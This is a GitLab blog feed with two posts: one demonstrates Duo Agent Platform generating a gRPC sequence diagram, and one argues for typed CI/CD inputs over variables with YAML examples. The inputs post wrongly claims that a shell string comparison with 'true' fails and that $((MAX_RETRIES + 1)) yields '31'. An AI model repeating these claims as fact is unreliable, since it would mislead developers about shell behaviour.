<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <id>https://about.gitlab.com/blog</id>
    <title>GitLab</title>
    <updated>2025-07-08T01:12:02.034Z</updated>
    <generator>https://github.com/jpmonette/feed</generator>
    <author>
        <name>The GitLab Team</name>
    </author>
    <link rel="alternate" href="https://about.gitlab.com/blog"/>
    <link rel="self" href="https://about.gitlab.com/atom.xml"/>
    <subtitle>GitLab Blog RSS feed</subtitle>
    <icon>https://about.gitlab.com/favicon.ico</icon>
    <rights>All rights reserved 2025</rights>
    <entry>
        <title type="html"><![CDATA[Accelerate learning with GitLab Duo Agent Platform]]></title>
        <id>https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/</id>
        <link href="https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we continue to expand our AI capabilities, so I often find myself learning and working in new codebases. Whether I'm debugging issues, implementing new features, or onboarding to different projects, understanding system architecture quickly is crucial. But let's be honest — manually tracing through complex communication flows, especially gRPC connections, can eat up hours of productive development time.</p>
<p>This is exactly the type of tedious, yet necessary, work <a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform</a> is designed to handle. Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.</p>
<p>Let me show you how I used <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform</a> to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.</p>
<p>You can follow along with this video:</p>
<p>&lt;div style=&quot;padding:75% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1098569263?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>The challenge: Understanding gRPC communication flows</h2>
<p>I was working with a project called &quot;Duo Workflow Executor&quot; that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.</p>
<p>My goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.</p>
<p>Working in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:</p>
<p>&quot;Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file.&quot;</p>
<p>Duo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:</p>
<ul>
<li>Searched through relevant Go files in the project</li>
<li>Read the specific file I mentioned (runner.go)</li>
<li>Identified additional files that would provide necessary context</li>
<li>Analyzed the codebase structure to understand the gRPC implementation</li>
</ul>
<p>This contextual awareness is what sets agentic AI tools apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.</p>
<h2>Collaborative refinement</h2>
<p>Rather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted.</p>
<p><strong>Agent:</strong> &quot;Should I include error handling details in the diagram?&quot;</p>
<p><strong>Me:</strong> &quot;Don't focus on error handling. Include all actions. Focus on gRPC payload.&quot;</p>
<p>This back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.</p>
<h2>Execution and results</h2>
<p>With the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.</p>
<p>The agent then executed each task in sequence, providing real-time progress updates. Within minutes, it had:</p>
<ul>
<li>Analyzed all relevant files across the project</li>
<li>Created comprehensive documentation with a detailed mermaid diagram</li>
<li>Saved everything to the requested grpc.md file</li>
<li>Included valuable context about outgoing payloads and connection management</li>
</ul>
<p>The resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.</p>
<h2>Reviewing the output</h2>
<p>Here's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:</p>
<pre><code class="language-mermaid">sequenceDiagram
participant DWS as duo-workflow-service
participant DWE as duo-workflow-executor
participant Runner as ExecutionRunner
participant ActionExecutor as Action Executor
participant FileSystem as File System/Commands


Note over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)

%% Connection Establishment
DWE-&gt;&gt;DWS: gRPC Connection with Headers
Note over DWE, DWS: Headers: authorization (Bearer token)&lt;br/&gt;x-gitlab-authentication-type: oidc&lt;br/&gt;x-gitlab-realm, x-gitlab-global-user-id&lt;br/&gt;x-gitlab-oauth-token, x-gitlab-base-url&lt;br/&gt;x-gitlab-instance-id, x-request-id&lt;br/&gt;x-gitlab-namespace-id, x-gitlab-project-id


%% Workflow Start Request
DWE-&gt;&gt;DWS: ClientEvent{StartWorkflowRequest}
Note over DWE, DWS: StartWorkflowRequest:&lt;br/&gt;- ClientVersion&lt;br/&gt;- WorkflowDefinition&lt;br/&gt;- Goal&lt;br/&gt;- WorkflowID&lt;br/&gt;- WorkflowMetadata&lt;br/&gt;- ClientCapabilities[]


%% Action Processing Loop
loop Action Processing
    DWS-&gt;&gt;DWE: Action Message
    Note over DWS, DWE: Action Types:&lt;br/&gt;- Action_RunCommand {program, flags[], arguments[]}&lt;br/&gt;- Action_RunGitCommand {command, arguments[], repositoryUrl}&lt;br/&gt;- Action_RunReadFile {filepath}&lt;br/&gt;- Action_RunWriteFile {filepath, contents}&lt;br/&gt;- Action_RunEditFile {filepath, oldString, newString}&lt;br/&gt;- Action_RunHTTPRequest {method, path, body}&lt;br/&gt;- Action_ListDirectory {directory}&lt;br/&gt;- Action_FindFiles {namePattern}&lt;br/&gt;- Action_Grep {searchDirectory, pattern, caseInsensitive}&lt;br/&gt;- Action_NewCheckpoint {}&lt;br/&gt;- Action_RunMCPTool {}


    DWE-&gt;&gt;Runner: Receive Action
    Runner-&gt;&gt;Runner: processWorkflowActions()
    Runner-&gt;&gt;ActionExecutor: executeAction(ctx, action)
    
    alt Action_RunCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Shell Command
        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments&lt;br/&gt;in basePath directory
        FileSystem--&gt;&gt;ActionExecutor: Command Output + Exit Code
    
    else Action_RunReadFile
        ActionExecutor-&gt;&gt;FileSystem: Read File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Read file contents
        FileSystem--&gt;&gt;ActionExecutor: File Contents
    
    else Action_RunWriteFile
        ActionExecutor-&gt;&gt;FileSystem: Write File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Create/overwrite file
        FileSystem--&gt;&gt;ActionExecutor: Success/Error Message
    
    else Action_RunEditFile
        ActionExecutor-&gt;&gt;FileSystem: Edit File
        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write&lt;br/&gt;Check gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Edit Result Message
    
    else Action_RunGitCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Git Command 
        Note over ActionExecutor, FileSystem: Git operations with authentication&lt;br/&gt;Uses provided git config
        FileSystem--&gt;&gt;ActionExecutor: Git Command Output
    
    else Action_RunHTTPRequest
        ActionExecutor-&gt;&gt;DWS: HTTP Request to GitLab API
        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE&lt;br/&gt;Path: API endpoint&lt;br/&gt;Body: Request payload&lt;br/&gt;Headers: Authorization
        DWS--&gt;&gt;ActionExecutor: HTTP Response
    
    else Action_ListDirectory
        ActionExecutor-&gt;&gt;FileSystem: List Directory Contents
        Note over ActionExecutor, FileSystem: Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Directory Listing
    
    else Action_FindFiles
        ActionExecutor-&gt;&gt;FileSystem: Find Files by Pattern
        Note over ActionExecutor, FileSystem: Recursive search with name pattern&lt;br/&gt;Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: File Paths List
    
    else Action_Grep
        ActionExecutor-&gt;&gt;FileSystem: Search Text Pattern
        Note over ActionExecutor, FileSystem: Recursive text search&lt;br/&gt;Case sensitive/insensitive option
        FileSystem--&gt;&gt;ActionExecutor: Search Results
    
    else Action_NewCheckpoint/Action_RunMCPTool
        ActionExecutor-&gt;&gt;ActionExecutor: No-op Action
        Note over ActionExecutor: Returns empty success result
    end


    ActionExecutor--&gt;&gt;Runner: Action Result (string)
    
    alt Result Size Check
        Runner-&gt;&gt;Runner: Check if result &gt; 4MB
        Note over Runner: If result exceeds MaxMessageSize (4MB)&lt;br/&gt;Replace with error message about size limit
    end


    Runner-&gt;&gt;DWE: ActionResponse
    DWE-&gt;&gt;DWS: ClientEvent{ActionResponse}
    Note over DWE, DWS: ActionResponse:&lt;br/&gt;- RequestID (matches Action.RequestID)&lt;br/&gt;- Response (execution result string)
end


%% Workflow Completion
DWE-&gt;&gt;DWS: CloseSend()
Note over DWE, DWS: Signal end of workflow execution


%% Analytics and Cleanup
Runner-&gt;&gt;Runner: Send Analytics Event (Finish)
DWE-&gt;&gt;DWE: Token Revocation (if enabled)
DWE-&gt;&gt;DWS: Close gRPC Connection
</code></pre>
<p>This diagram reveals several important architectural insights that would have taken considerable time to extract manually:</p>
<ul>
<li><strong>Bidirectional communication:</strong> The workflow executor both initiates requests and responds to service actions.</li>
<li><strong>Rich payload structure:</strong> Each action type has specific parameters and expected responses.</li>
<li><strong>Multiple integration points:</strong> The executor interacts with local filesystem, Git repositories, and GitLab APIs.</li>
<li><strong>Comprehensive action set:</strong> Nine different action types handle everything from file operations to HTTP requests.</li>
<li><strong>Proper lifecycle management:</strong> Clear connection establishment and teardown patterns.</li>
</ul>
<p>What impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.</p>
<h2>Looking ahead</h2>
<p>This demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:</p>
<ul>
<li><strong>Code reviews:</strong> Agents can analyze merge requests with full project context</li>
<li><strong>Testing:</strong> Generate comprehensive test suites based on actual usage patterns</li>
<li><strong>Debugging:</strong> Trace issues across multiple services and components</li>
<li><strong>Security scanning:</strong> Identify vulnerabilities with understanding of your specific architecture</li>
<li><strong>CI/CD optimization:</strong> Improve pipeline performance based on historical data</li>
</ul>
<p>GitLab Duo Agent Platform will enter public beta soon, so <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">join the wait list today</a>.</p>
<p>Stay tuned to the <a href="https://about.gitlab.com/blog/">GitLab Blog</a> and social channels for additional updates. GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.</p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform: What’s next for intelligent DevSecOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
</ul>
]]></content>
        <author>
            <name>Halil Coban</name>
            <uri>https://about.gitlab.com/blog/authors/halil-coban</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[CI/CD inputs: Secure and preferred method to pass parameters to a pipeline]]></title>
        <id>https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/</id>
        <link href="https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab CI/CD inputs represent the future of pipeline parameter passing. As
a purpose-built feature designed specifically for typed parameters with
validation, clear contracts, and enhanced security, inputs solve the
fundamental challenges that teams have been working around with variables
for years.</p>
<p>While CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.</p>
<p>This article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.</p>
<h2>The hidden costs of variable-based parameter passing</h2>
<p>The problems with using variables for parameter passing are numerous and frustrating.</p>
<p><strong>No type validation</strong></p>
<p>Variables are strings. There is no type validation, so a pipeline expecting a boolean or a number can accidentally receive an arbitrary string. This leads to unexpected failures deep into pipeline execution. In a deployment workflow, for example, a critical production deployment can fail hours after it started because a boolean check on a variable did not evaluate as expected.</p>
<p><strong>Runtime mutability</strong></p>
<p>Variables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets <code>DEPLOY_ENV=staging</code>, but deploy_job_b changes the <code>DEPLOY_ENV</code> value to <code>production</code>.</p>
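<p>One way this plays out, sketched here with dotenv artifact reports (the job and file names are illustrative, not from the original project), is two jobs passing different values for the same variable to a downstream job:</p>
<pre><code class="language-yaml">deploy_job_a:
  stage: build
  script:
    - echo &quot;DEPLOY_ENV=staging&quot; &gt;&gt; build.env
  artifacts:
    reports:
      dotenv: build.env

deploy_job_b:
  stage: build
  script:
    - echo &quot;DEPLOY_ENV=production&quot; &gt;&gt; deploy.env
  artifacts:
    reports:
      dotenv: deploy.env

deploy_app:
  stage: deploy
  script:
    - echo &quot;Deploying to $DEPLOY_ENV&quot;  # Which value wins is not obvious from this job alone
</code></pre>
<p>Nothing in <code>deploy_app</code> declares which value it expects, so a change in either upstream job silently changes deployment behavior.</p>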
<p><strong>Security risks</strong></p>
<p>Security concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple <code>BUILD_TYPE</code> parameter that seems innocuous at first glance suddenly has access to production secrets, simply because variables do not inherently distinguish between parameters and sensitive data.</p>
<p>Perhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.</p>
<p>Many users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking &quot;How can we test pipelines locally?&quot; we started asking &quot;How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?&quot;</p>
<h2>Understanding variable precedence</h2>
<p>GitLab's variable system includes multiple <a href="https://docs.gitlab.com/ci/variables/#cicd-variable-precedence">precedence levels</a> to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.</p>
<p>When creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.</p>
<p>When including multiple templates, it also can be challenging to track which variables are being set where and how they might interact.</p>
<p>In addition, component authors need to document not just what variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.</p>
<h3>Variable precedence examples</h3>
<p><strong>Main pipeline file (<code>.gitlab-ci.yml</code>):</strong></p>
<pre><code class="language-yaml">variables:
  ENVIRONMENT: production  # Top-level default for all jobs
  DATABASE_URL: prod-db.example.com

include:
  - local: 'templates/test-template.yml'
  - local: 'templates/deploy-template.yml'
</code></pre>
<p><strong>Test template (<code>templates/test-template.yml</code>):</strong></p>
<pre><code class="language-yaml">run-tests:
  variables:
    ENVIRONMENT: test  # Job-level variable overrides the default
  script:
    - echo &quot;Running tests in $ENVIRONMENT environment&quot;
    - echo &quot;Database URL is $DATABASE_URL&quot;  # Still inherits prod-db.example.com!
    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL
    # Issue: Tests run in the &quot;test&quot; environment but against the production database
</code></pre>
<p><strong>Deploy template (<code>templates/deploy-template.yml</code>):</strong></p>
<pre><code class="language-yaml">deploy-app:
  script:
    - echo &quot;Deploying to $ENVIRONMENT&quot;  # Uses production (top-level default)
    - echo &quot;Database URL is $DATABASE_URL&quot;  # Uses prod-db.example.com
    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL
    # This will deploy to production as intended
</code></pre>
<p><strong>The challenges in this example:</strong></p>
<ol>
<li>
<p>Partial inheritance: The test job gets <code>ENVIRONMENT=test</code> but still inherits <code>DATABASE_URL=prod-db.example.com</code>.</p>
</li>
<li>
<p>Coordination complexity: Template authors must know what top-level variables exist and might conflict.</p>
</li>
<li>
<p>Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.</p>
</li>
<li>
<p>Hidden dependencies: Templates become dependent on the main pipeline's variable names.</p>
</li>
</ol>
<p>GitLab recognized these pain points and introduced <a href="https://docs.gitlab.com/ee/ci/inputs/">CI/CD inputs</a> as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.</p>
<h2>CI/CD inputs fundamentals</h2>
<p>Inputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.</p>
<h3>Configuration flexibility and scope</h3>
<p>One of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format <code>$[[ inputs.input-id ]]</code>, meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.</p>
<p>One common use case we've seen is users defining job names like <code>test-$[[ inputs.environment ]]-deployment</code>.</p>
<p>When using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. Input-based job names ensure each inclusion creates uniquely named jobs.</p>
<p><strong>Before inputs:</strong></p>
<pre><code class="language-yaml">test-service:
  variables:
    SERVICE_NAME: auth-service
    ENVIRONMENT: staging
  script:
    - run-tests-for $SERVICE_NAME in $ENVIRONMENT
</code></pre>
<p><strong>With inputs:</strong></p>
<pre><code class="language-yaml">spec:
  inputs:
    environment:
      type: string
    service_name:
      type: string
---
test-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:
  script:
    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]
</code></pre>
<p>When included multiple times with different inputs, this creates jobs like <code>test-auth-service-staging</code>, <code>test-payment-service-production</code>, and <code>test-notification-service-development</code>. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.</p>
<p>Now let's go back to the first example at the top of this blog and use inputs. One immediate benefit is that instead of maintaining multiple template files, we can use one reusable template with different input values:</p>
<pre><code class="language-yaml">spec:
  inputs:
    environment:
      type: string
    database_url:
      type: string
    action:
      type: string
---
$[[ inputs.action ]]-$[[ inputs.environment ]]:
  script:
    - echo &quot;Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment&quot;
    - echo &quot;Database URL is $[[ inputs.database_url ]]&quot;
    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]
</code></pre>
<p>In the main <code>.gitlab-ci.yml</code> file, we can include it twice (or more) with different values, avoiding naming collisions:</p>
<pre><code class="language-yaml">include:
  - local: 'templates/environment-template.yml'
    inputs:
      environment: test
      database_url: test-db.example.com
      action: tests
  - local: 'templates/environment-template.yml'
    inputs:
      environment: production
      database_url: prod-db.example.com
      action: deploy
</code></pre>
<p><strong>The result:</strong> Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.</p>
<h3>Validation and type safety</h3>
<p>Another key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.</p>
<p>Here is an example of the enormous benefit of type validation.</p>
<p><strong>Without type validation (variables):</strong></p>
<pre><code class="language-yaml">
variables:
  ENABLE_TESTS: &quot;true&quot;  # Always a string
  MAX_RETRIES: &quot;3&quot;      # Always a string

  
deploy_job:
  script:
    - if [ &quot;$ENABLE_TESTS&quot; = true ]; then  # This fails!
        echo &quot;Running tests&quot;
      fi
    - retry_count=$((MAX_RETRIES + 1))      # String concatenation: &quot;31&quot;

</code></pre>
<p><strong>Problem:</strong> The boolean check fails because <code>&quot;true&quot;</code> (string) is not equal to <code>true</code> (boolean).</p>
<p><strong>With type validation (inputs):</strong></p>
<pre><code class="language-yaml">
spec:
  inputs:
    enable_tests:
      type: boolean
      default: true
    max_retries:
      type: number
      default: 3

      
deploy_job:
  script:
    - if [ &quot;$[[ inputs.enable_tests ]]&quot; = true ]; then  # Works correctly
        echo &quot;Running tests&quot;
      fi
    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4

</code></pre>
<p><strong>Real-world impact of a variable type validation failure</strong>: A developer or a process triggers a GitLab CI/CD pipeline with <code>ENABLE_TESTS = yes</code> instead of <code>true</code>. Assuming it takes on average 30 minutes before the deployment job starts, then when that job finally kicks off, 30 minutes or longer into the pipeline run, the deployment script tries to evaluate the boolean and fails.</p>
<p>Imagine the impact in terms of time-to-market and, of course, developer time spent trying to debug why a seemingly basic deploy job failed.</p>
<p>With type inputs, GitLab CI/CD will immediately throw an error and provide an explicit error message regarding the type mismatch.</p>
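<p>Beyond type checks, string inputs can also restrict the set of allowed values with <code>options</code> (and patterns with <code>regex</code>), so a typo is caught before any job runs. A minimal sketch, with illustrative input and job names:</p>
<pre><code class="language-yaml">spec:
  inputs:
    environment:
      type: string
      options: ['staging', 'production']  # Any other value is rejected at pipeline creation
    max_retries:
      type: number
      default: 3
---
deploy-$[[ inputs.environment ]]:
  script:
    - deploy --env=$[[ inputs.environment ]] --retries=$[[ inputs.max_retries ]]
</code></pre>
<p>Passing <code>environment: prodcution</code> here fails immediately with a validation error instead of surfacing minutes or hours later inside a job.</p>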
<h3>Security and access control</h3>
<p>Inputs provide enhanced security through controlled parameter passing, with explicit contracts that define exactly what values are expected and allowed, creating a clear boundary between pipeline parameters and sensitive data. In addition, inputs are immutable: Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.</p>
<h3>Scope and lifecycle</h3>
<p>When you define variables using the <code>variables:</code> keyword at the top level of your <code>.gitlab-ci.yml</code> file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.</p>
<p>Inputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.</p>
<h2>Working with variables and inputs together</h2>
<p>We recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.</p>
<p>Let's look at this real-world example.</p>
<p><strong>Variable expansion in rules conditions</strong></p>
<p>A common challenge occurs when using variables that contain other variable references in <code>rules:if</code> conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:</p>
<pre><code class="language-yaml"># This doesn't work as expected

variables:
  TARGET_ENV:
    value: &quot;${CI_COMMIT_REF_SLUG}&quot;

deploy-job:
  rules:
    - if: '$TARGET_ENV == &quot;production&quot;'  # Compares &quot;${CI_COMMIT_REF_SLUG}&quot; != &quot;production&quot;
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
</code></pre>
<p>The <code>expand_vars</code> function solves this by forcing proper variable expansion in inputs:</p>
<pre><code class="language-yaml">spec:
  inputs:
    target_environment:
      description: &quot;Target deployment environment&quot;
      default: &quot;${CI_COMMIT_REF_SLUG}&quot;
---


deploy-job:
  rules:
    - if: '&quot;$[[ inputs.target_environment | expand_vars ]]&quot; == &quot;production&quot;'
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
        APPROVAL_REQUIRED: &quot;true&quot;
    - when: always
      variables:
        DEPLOY_MODE: &quot;rolling&quot;
        APPROVAL_REQUIRED: &quot;false&quot;
  script:
    - echo &quot;Target: $[[ inputs.target_environment | expand_vars ]]&quot;
    - echo &quot;Deploy mode: ${DEPLOY_MODE}&quot;
</code></pre>
<h3>Why this matters</h3>
<p>Without <code>expand_vars</code>, rule conditions evaluate against the literal variable reference (like <code>&quot;${CI_COMMIT_REF_SLUG}&quot;</code>) rather than the expanded value (like <code>&quot;production&quot;</code>). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.</p>
<p><strong>Important notes about expand_vars:</strong></p>
<ul>
<li>
<p>Only variables that can be used with the <code>include</code> keyword are supported</p>
</li>
<li>
<p>Variables must be unmasked (not marked as protected/masked)</p>
</li>
<li>
<p>Nested variable expansion is not supported</p>
</li>
<li>
<p>Rule conditions using <code>expand_vars</code> must be properly quoted: <code>'&quot;$[[ inputs.name | expand_vars ]]&quot; == &quot;value&quot;'</code></p>
</li>
</ul>
<p>This pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.</p>
<h3>Function chaining for advanced processing</h3>
<p>Along with <code>expand_vars</code>, you can use functions like <code>truncate</code> to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.</p>
<pre><code class="language-yaml">spec:
  inputs:
    service_identifier:
      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'
---

create-resource:
  script:
    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]
</code></pre>
<p>This integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.</p>
<h3>From components only to CI pipelines</h3>
<p>Up until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the <code>include:</code> syntax. This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.</p>
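<p>That usage looks like the following (the component path and input values are illustrative):</p>
<pre><code class="language-yaml">include:
  - component: gitlab.com/my-group/scanner-component@1.0.0
    inputs:
      stage: test
      scanner_version: "2.1.0"
</code></pre>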
<h3>Pipeline-wide inputs support</h3>
<p>Starting with GitLab 17.11, GitLab users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:</p>
<ul>
<li>
<p>Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.</p>
</li>
<li>
<p>Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.</p>
</li>
<li>
<p>Manual pipelines: Present users with a clean, validated form interface.</p>
</li>
</ul>
<p>Those enhancements, with more to follow, allow teams to modernize their pipelines gradually while maintaining backward compatibility. Once inputs are fully adopted, users can disable pipeline variables to ensure a more secure and predictable CI/CD environment.</p>
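<p>In practice (a sketch; the job and input names are illustrative), this means a project's own <code>.gitlab-ci.yml</code> can declare typed inputs that surface as a validated form for manual runs and can be supplied to scheduled or downstream pipelines:</p>
<pre><code class="language-yaml">spec:
  inputs:
    environment:
      type: string
      default: staging
      options: [staging, production]
    replicas:
      type: number
      default: 2
---
deploy:
  script:
    - ./deploy.sh --env "$[[ inputs.environment ]]" --replicas "$[[ inputs.replicas ]]"
</code></pre>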
<h2>Summary</h2>
<p>The transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.</p>
<p>We understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The <code>expand_vars</code> function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.</p>
